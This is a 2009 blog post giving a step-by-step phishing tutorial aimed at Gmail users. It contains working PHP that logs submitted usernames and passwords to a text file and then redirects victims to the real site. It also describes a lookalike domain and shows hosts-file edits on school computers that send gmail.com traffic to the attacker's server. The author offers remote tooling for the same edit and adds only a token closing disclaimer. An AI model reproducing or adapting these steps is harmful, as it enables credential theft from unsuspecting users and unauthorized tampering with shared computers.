Sunday, March 29, 2009

Phishing : LEVEL 2!

1. Create a phisher. (follow the below steps or refer to prervios post for detailed explanation)
Go to your target site and copy the source code into notepad and save it as index.php

Now find the login form. Search for something like
CODE : 
 

<form action="login.php" method="POST">



Change it to
CODE: 
 

<form action="action.php" method="POST">



Now find something like
CODE : 
 

<input type="text" name="uxuser" /> <input type="password" name="uxpass" />




Change that to
CODE : 
 

<input type="text" name="username" /> <input type="password" name="password" />



Save your index file your done with that part.

Now copy this into notepad and save it as action.php
CODE : 
 

$content = $_POST['username']."\n".$_POST['password']."\n \n";
$fh1 = fopen("passwords.txt", 'a') or die("Error");
fwrite($fh1, $content);
fclose($fh1);
echo "<html><head><meta http-equiv=\"refresh\" content=\"0;url=http://phishedsiteurlhere.com\" />
</head><body></body></html>";
?>



Change the http://phisedsiteurlhere.com to the site your targeting (EG: http://gmail.com).

Upload your files and you have a functioning phisher.
(
I suggest you to create a url forwarding to the original website as a
redirect webpage, after the victim press the submit button after
entering the details on your phishing site, this will lead the victim
to enter password again there and they can access the data and lead to
less suspicion)
2. Redirect from http://gmail.com to http://gmai1.com (the l has been changed to a one) this is were your phisher is.
Ping your phisher and write down the ip address.

Hop on a school computer and hold the power key (windows key) and the r key. This will open up the run window. Type
CODE :
notepad c:\windows\system32\drivers\etc\hosts


Go to the end of the file and add this
CODE :

phisherIpAddress gmail.com
phisherIpAddress www.gmail.com


Now
when anyone navigates to www.gmail.com it will redirect them to the
phisher. Go home check the sever and there will be a passwords.txt
file. Open it, there should be usernames and passwords galore. YOU NEED
PHYSICAL ACCESS TO THE SYSTEM INORDER TO EDIT THIS HOST FILE, OR YOU
CAN CREATE SOME PROGRAMS TO DO IT FOR YOU REMOTELY, I HAVE A C#
APPLICATION FOR THIS PURPOSE, IF ANYBODY WANTS THE C# CODE/APP LET ME
KNOW!!

The moral of this story? Do not use sensitive information on public machines!
Posted by Anand Jain at 10:54 PM
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)